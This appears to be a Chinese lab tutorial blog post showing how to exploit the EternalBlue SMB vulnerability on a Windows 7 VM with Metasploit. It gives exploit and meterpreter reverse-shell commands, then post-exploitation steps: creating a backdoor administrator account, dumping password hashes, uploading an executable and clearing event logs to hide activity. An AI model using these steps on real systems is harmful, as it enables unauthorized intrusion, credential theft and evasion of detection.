攻下windows7第二天——永恒之蓝(MS017-010)漏洞

攻下windows7第二天——永恒之蓝(MS017-010)漏洞

一、永恒之蓝介绍

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、metasploit工具介绍

metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可
模块介绍:辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块

三、实验环境

攻击机kali :192.168.126.129
靶机 win7:192.168.126.134
注:win7 需要关闭防火墙以及未打永恒之蓝补丁

四、漏洞利用

1.启动软件

命令:msfconsole

在这里插入图片描述
在这里插入图片描述

2.在进行攻击利用之前,首先确实目标是否开放445端口,该漏洞Ms17-010是否存在,先做好简单的信息收集更能成功利用目标主机。

(1)利用msf的auxiliary模块进行漏洞验证

命令:search ms17-010
在这里插入图片描述

搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用
auxiliary/scanner/smb/smb_ms17_010这个模块进行验证

(2)利用模块
命令:

use auxiliary/scanner/smb/smb_ms17_010

(3)配置模块
命令:show options(options)
在这里插入图片描述

对yes的选项进行配置
命令:set rhost 192.168.126.134
命令:set rport 445
在这里插入图片描述

(4)配置好后,探测一下查看结果存在该漏洞
命令:run
在这里插入图片描述

(5)也可以使用nmap探测主机详细信息
命令:nmap -sV 192.168.202.131(不在msf5下输入)
在这里插入图片描述

3.验证存在漏洞之后,就可以利用永恒之蓝漏洞,使用其中的渗透攻击(exploit)模块,对其进行渗透攻击
(1)选择模块
命令:use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

(2)配置模块
命令:options
在这里插入图片描述

命令:set rhost 192.168.126.134
命令:set rport 445
在这里插入图片描述

(3)配置完成,发动攻击
命令:run
在这里插入图片描述
在这里插入图片描述
显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权。
① 进行后门植入(创建新的管理员账户)

 net user hack 123456 /add

//在windows 7上创建一个hack的用户,以便下次访问

 net localgroup administrators hack /add

//将hack加入到windows 7的本地管理员组中,以便获得更大权限
② 其他

net user

//查看windows 7本地用户

net localgroup administrators

//查看windows 7本地管理员

(4)可以使用meterpreter
meterpreter是metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell的链接。
meterpreter shell作为渗透模块有很多有用的功能,比如:添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统) 很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

命令:set payload windows/x64/meterpreter/reverse_tcp
在这里插入图片描述
在这里插入图片描述

run
在这里插入图片描述
在这里插入图片描述

从上面看出已经攻入成功,可以输入:
① sysinfo查看系统信息

meterpreter > sysinfo

在这里插入图片描述

② 反弹shell
meterpreter >shell
在这里插入图片描述

③ 获得用户密码
密码为hash加密值,可以利用在线解密进行破解
meterpreter > hashdump
在这里插入图片描述

④ 捕捉屏幕:
meterpreter > screenhot
在这里插入图片描述

Win7
在这里插入图片描述

到kali root/这个路径下查看,可以看到返回的图片
在这里插入图片描述

⑤ 上传文件
“upload”命令为上传文件到靶机下测试上传了一个hack.exe文件到,可以直接执行
在这里插入图片描述

⑥ 清除事件日志
执行“clearev”命令,将清除事件日志。
在这里插入图片描述

其他命令详解: http://blog.sina.com.cn/s/blog_4c86552f0102wll1.html
https://www.cnblogs.com/backlion/p/9484949.html

网络信息安全-ploto

  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值